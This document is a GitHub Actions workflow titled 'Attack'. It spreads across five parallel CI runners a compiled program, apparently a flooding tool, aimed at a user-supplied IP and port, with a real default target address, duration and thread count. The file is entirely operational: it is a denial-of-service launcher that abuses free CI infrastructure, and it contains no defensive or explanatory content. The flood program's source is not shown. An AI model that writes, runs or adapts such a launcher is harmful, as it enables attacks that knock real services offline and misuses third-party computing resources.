name: Attack

on:
  workflow_dispatch:
    inputs:
      ip:
        description: 'Target IP'
        required: true
        default: '91.108.17.10'
      port:
        description: 'Target Port'
        required: true
        default: '32001'
      time:
        description: 'Duration (seconds)'
        required: true
        default: '60'
      threads:
        description: 'Threads per Job'
        required: true
        default: '10'

jobs:
  attack_1:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
    - run: gcc -o mustu mustu.c -lpthread
    - run: ./mustu ${{ github.event.inputs.ip }} ${{ github.event.inputs.port }} ${{ github.event.inputs.time }} ${{ github.event.inputs.threads }}

  attack_2:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
    - run: gcc -o mustu mustu.c -lpthread
    - run: ./mustu ${{ github.event.inputs.ip }} ${{ github.event.inputs.port }} ${{ github.event.inputs.time }} ${{ github.event.inputs.threads }}

  attack_3:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
    - run: gcc -o mustu mustu.c -lpthread
    - run: ./mustu ${{ github.event.inputs.ip }} ${{ github.event.inputs.port }} ${{ github.event.inputs.time }} ${{ github.event.inputs.threads }}

  attack_4:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
    - run: gcc -o mustu mustu.c -lpthread
    - run: ./mustu ${{ github.event.inputs.ip }} ${{ github.event.inputs.port }} ${{ github.event.inputs.time }} ${{ github.event.inputs.threads }}

  attack_5:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
    - run: gcc -o mustu mustu.c -lpthread
    - run: ./mustu ${{ github.event.inputs.ip }} ${{ github.event.inputs.port }} ${{ github.event.inputs.time }} ${{ github.event.inputs.threads }}
